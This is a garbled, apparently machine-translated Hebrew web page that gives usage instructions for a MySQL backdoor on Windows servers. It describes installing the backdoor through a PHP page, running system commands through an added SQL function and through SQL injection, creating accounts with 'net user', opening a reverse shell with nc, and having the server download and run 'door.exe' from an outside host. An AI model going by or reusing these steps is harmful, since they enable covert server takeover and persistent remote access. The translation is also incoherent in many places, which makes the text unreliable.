MySQL אחורית
מקור: פורי מנצ'סטר
אחורית MySQL היה דלת אחורית לפיתוח שרת PHP + Mysql עבור MySQL אחרי הדלת האחורית להתקין להוסיף פונקציית "מדינה" יכול לבצע פקודות מערכת, ולהתחיל בתהליך של MySQL מבוססת ה-DLL המריח סוג הדלת האחורית, הבין בחוכמה אין יציאה, אין תהליך, אין שירותים באמצעות סוס טרויאני הקיר. התוכנית WINXP WIN2003 + MYSQL5.0.X, ותחת הסיסמה.
ההתקנה יהיה Mysql.php להתפשט שרת PHP, על פי למלא מארח משתמש DB-סיסמה, לחץ על "Mysql אחורית אוטומטית להתקין"
לאחר התקנה מוצלחת, MySQL היה להיות מוגברת על ידי פונקציית "מדינה", תוך כדי תהליך MySQL הוא פועל מרחרח את הדלת האחורית של דלת אחורית זה ב-Windows יש את אותה מערכת הרשאות ו-MySQL.
השימוש בפונקציות המדינה
תפקיד המדינה הוא למעשה מערכת PHP () "הפונקציה אותה פונקציה ניתן להשתמש כדי לבצע פקודות מערכת נא להזין את פקודת SQL:." משרד ולמלא את ההצהרה MySQL להיות מוצא להורג, כגון "בחר את המדינה (" nohack המשתמש נטו / להוסיף "), ללחוץ על" בצע משפטי SQL יפעל תוצאות.
עם תפקוד המדינה מבוסס לרחרח את הדלת האחורית, גם אם איבד WebShell, כל עוד שרת, הצבע הזרקת SQL, אנו יכולים באמצעות זריקה. PHP? Id = 1 ומדינה ("המשתמש נטו") "השיטה מבצעת בשרת .? הפקודה עם זאת, אם נקודת ההזרקה נכון שאנחנו עדיין קוראים להריח את השרת בחזרה את השליטה הדלת נשלח לכל יציאה של שרת ופתוח Mysql "תחילתו של מנות, יוכלו לקרוא להריח את הדלת האחורית, כגון.:
המערכת המפעילה את הפקודה: NC-IP של 80 -> הזן -> mysql-cmd / c המשתמש ברשת ABC / תוספת> C :/ log.txt, (הערה: "!" האחרון לא ניתן להשמיט)
2 20082 נמל הקליפה כדי להקפיץ שרת מקומי: בטווח הראשון של NC-20 LP 082 לפקח 20082 של המכונה הנמל, ולאחר מכן של NC-IP 80 -> הזן -> mysql-C -> הזן
תנו את ההורדה לשרת: IP של NC 80 -> הזן -> mysql-http :/ / www.x.com / door.exe-C mydoor.exe (הערה: לאחרונה "לא יכול להיות מושמט)
בנוסף שולח "mysql-c-", את הפקודה השני אין הד, אך את הפקודות המתאימות בשרת שבו פועל.
הסר Mysql על "מדינה ירידה בתפקוד" בטווח ניתן לפרוק, אבל באותו זמן תגרום תהליך MySQL כדי לצאת, לחזור לשגרה לאחר אתחול מחדש.










































154 Trackback (ים)
עליך להיות מחובר בכדי לפרסם תגובה.